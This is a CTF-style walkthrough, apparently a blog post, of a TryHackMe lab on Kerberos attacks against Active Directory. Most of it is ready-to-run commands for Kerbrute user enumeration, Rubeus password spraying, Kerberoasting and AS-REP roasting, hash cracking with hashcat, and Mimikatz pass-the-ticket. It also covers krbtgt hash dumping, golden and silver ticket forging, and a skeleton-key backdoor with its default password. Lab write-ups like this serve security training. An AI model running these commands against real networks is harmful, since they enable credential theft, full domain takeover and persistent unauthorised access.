#kerberos
This is a follow up write up from Active Directory enumeration and attacks for beginners. Credit to TryHackMe for a fantastic learning room.
Contents:
- Enumeration with Kerbrute
2. Harvesting & Brute-Forcing Tickets — Rubeus
3. Brute forcing / password spraying with Rubeus
4. Kerberoasting — Rubeus & Impacket
5. AS-REP Roasting — Rubeus
6. Pass the Ticket with Mimikatz
7. Golden / Silver Ticket attacks — Mimikatz
8. Kerberos backdoors with mimikatz
Lets begin
1. Enumeration with Kerbrute
sudo ./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local /tmp/User.txt
we have a number of usernames which are quite useful. Lets make note of them.
2. Harvesting & Brute-Forcing Tickets — Rubeus
go to where Rubeus tool is and run:
Rubeus.exe harvest /interval:30
- it tells it to harvest TGT tickets every 30 seconds
3. Brute forcing / password spraying with Rubeus
- When brute-forcing passwords you use a single user account and a wordlist of password. (Source TryHackMe)
- password spraying, you give a single password such as Password1 and “spray” against all found user accounts in the domain to find which one may have that password. (Source TryHackMe)
First need to add to /etc/hosts
echo 10.10.78.84 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
The command below will take a given password and “spray” it against all found users then give the .kirbi TGT for that user
Rubeus.exe brute /password:Password1 /noticket
4. Kerberoasting — Rubeus & Impacket
This command willdump hashes of all kerberoastable accounts
Rubeus.exe kerberoast
it finds 2 accounts:
- httpservice
- sqlservice
Now you can crack the hash using hashcat -m 13100 command
(if you copy and paste from windows to linux you may need to replace spaces and \n — just use find and replace on any editor)
Method 2 — Using Impacket
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.50.197 -request
we then crack the hash using hashcat command from above
5. AS-REP Roasting — Rubeus
Very similar to Kerberoasting, AS-REP Roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting these users do not have to be service accounts the only requirement to be able to AS-REP roast a user is the user must have pre-authentication disabled. (Source TryHackMe)
Rubeus.exe asreproast
- transfer over to your box
IMPORTANT:
- Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User…..
- crack with hashcat
6. Pass the Ticket — Mimikatz
mimikatz.exe
privilege::debug
- to export .kirbi tickets:
sekurlsa::tickets /export
It is best to look for an administrator ticket from the krbtgt
Now we have the ticket we can perform pass the ticket attack
- these are the tickets — note the Admin ones at the top
- run the below command in mimikatz
kerberos::ptt [0;2984d0]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
7. Golden / Silver Ticket attacks — Mimikatz
Dump the krbtgt hash
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
- if you wanted to create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account. (Source TryHackMe.com)
Creating the Golden Ticket
in the below command you need to provide: SID, KRBTGT and ID (ensure no spaces)
Kerberos::golden /user:Administrator /domain:controller.local /sid:<enterhere> /krbtgt:<enterhere> /id:<enterhere>
also for ID enter 500
- and do not forget no spaces (as shown in below image)
*Silver Ticket*
to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into sid, and change the id to 1103.(Source TryHackMe.com)
Use the Golden/Silver Ticket to access other machines
misc::cmd
Below information source is TryHackMe.com (inc image)
Access machines that you want, what you can access will depend on the privileges of the user that you decided to take the ticket from however if you took the ticket from krbtgt you have access to the ENTIRE network hence the name golden ticket; however, silver tickets only have access to those that the user has access to if it is a domain admin it can almost access the entire network however it is slightly less elevated from a golden ticket.
8. Kerberos backdoors with mimikatz
a backdoor is much more stable than Golden / Silver tickets
privilege::debug
misc::skeleton
- the above command installs the skeleton key with mimikatz
The below information source is TryHackMe.com
Accessing the forest -
The default credentials will be: “mimikatz”
example: net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
- The share will now be accessible without the need for the Administrators password
example: dir \\Desktop-1\c$ /user:Machine1 mimikatz
- access the directory of Desktop-1 without ever knowing what users have access to Desktop-1
The skeleton key will not persist by itself because it runs in the memory, it can be scripted or persisted using other tools and techniques however that is out of scope for this room.
Credit and a huge thank you to TryHackMe.com — these rooms are invaluable to my development.
Any information taken from Try Hack Me and used in this document is marked as source TryHackMe(.com)